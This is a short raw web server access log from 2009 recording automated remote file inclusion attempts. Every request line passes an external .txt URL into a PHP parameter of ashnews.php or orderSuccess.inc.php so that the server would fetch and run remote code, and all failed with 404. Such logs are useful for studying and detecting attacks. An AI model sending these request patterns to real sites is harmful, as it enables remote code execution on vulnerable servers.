91.202.253.13 - - [01/Nov/2009:02:07:33 -0500] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:02:07:33 -0500] "GET //ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:02:07:33 -0500] "GET //ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:02:07:34 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:02:07:34 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.808"
213.79.101.98 - - [01/Nov/2009:02:07:57 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
